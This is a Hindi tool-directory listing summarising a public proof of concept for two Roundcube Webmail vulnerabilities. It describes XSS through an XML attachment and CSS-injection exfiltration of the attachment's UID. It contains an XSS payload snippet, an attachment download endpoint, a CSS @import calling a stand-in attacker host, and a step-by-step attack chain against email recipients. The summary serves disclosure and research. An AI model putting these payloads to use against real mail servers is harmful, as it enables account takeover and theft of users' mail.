Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC — Roundcube भेद्यताओं CVE-2024-42008 और CVE-2024-42010 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षाईमेल सुरक्षा
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

Roundcube भेद्यताओं CVE-2024-42008 और CVE-2024-42010 के लिए PoC

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
21 साल पहलेअभी तक समीक्षित नहीं

प्रूफ ऑफ कॉन्सेप्ट: CVE-2024-42008 और CVE-2024-42010

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) Roundcube Webmail में दो कमजोरियों के शोषण को प्रदर्शित करता है जो CSS इंजेक्शन और क्रॉस-साइट स्क्रिप्टिंग (XSS) को सक्षम बनाती हैं। इस हमले में दो चरण शामिल हैं:

  1. दुर्भावनापूर्ण XML अनुलग्नक के माध्यम से XSS (CVE-2024-42008)

    अपर्याप्त फ़ाइल अपलोड जाँचों के कारण, JavaScript कोड के साथ एक XML फ़ाइल को अनुलग्नक के रूप में भेजा जा सकता है, उदाहरण के लिए

    root@kitploit:~
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    

    यह एक ज्ञात समस्या थी, जिसे CVE-2020-13965 के रूप में ट्रैक किया गया था, और इसका शमन "Open attachment" विकल्प को अक्षम करना था। लेकिन फ़ाइल अभी भी इस एंडपॉइंट के माध्यम से एक्सेस की जा सकती है

    root@kitploit:~
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    जहाँ UID इस विशेष मेलबॉक्स (यानी INBOX) में इस विशेष अनुलग्नक के लिए अद्वितीय पहचानकर्ता है।

  2. CSS इंजेक्शन के माध्यम से HTML एक्सफिल्ट्रेशन (CVE-2024-42010)

    ईमेल भेजते समय, अपनी स्वयं की CSS फ़ाइल को इंजेक्ट करना संभव है, जब उसे a से शुरू होने वाले डोमेन पर होस्ट किया जाता है। उसके माध्यम से और एक JavaScript सर्वर फ़ाइल के माध्यम से, जो कमजोर Roundcube होस्ट द्वारा किए गए अनुरोधों को संसाधित करती है, दुर्भावनापूर्ण XSS अनुलग्नक का UID निकालना संभव है।

    भेजे गए ईमेल में CSS को इस प्रकार इम्पोर्ट करें

    root@kitploit:~
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    JS सर्वर (roundcube-css-exploit.js) को होस्ट करें जो दुर्भावनापूर्ण अनुलग्नक के UID को एक्सफिल्ट्रेट करता है

हमले की श्रृंखला

  1. अपने डोमेन में JavaScript सर्वर होस्ट करें
  2. दुर्भावनापूर्ण XML अनुलग्नक के साथ एक ईमेल भेजें और अपने डोमेन से CSS इम्पोर्ट करें
  3. पीड़ित ईमेल खोलता है और UID एक्सफिल्ट्रेट हो जाता है
  4. फिर, XSS डिलीवरी के पसंदीदा तरीके के आधार पर, आप या तो अनुलग्नक लिंक के साथ दूसरा ईमेल भेज सकते हैं या उपयोगकर्ता को वहाँ से रीडायरेक्ट कर सकते हैं।

स्रोत: सरकारी ईमेल जोखिम में: Roundcube Webmail में क्रिटिकल क्रॉस-साइट स्क्रिप्टिंग कमजोरी (Sonar की कमजोरी अनुसंधान टीम)

टूल डाउनलोड करें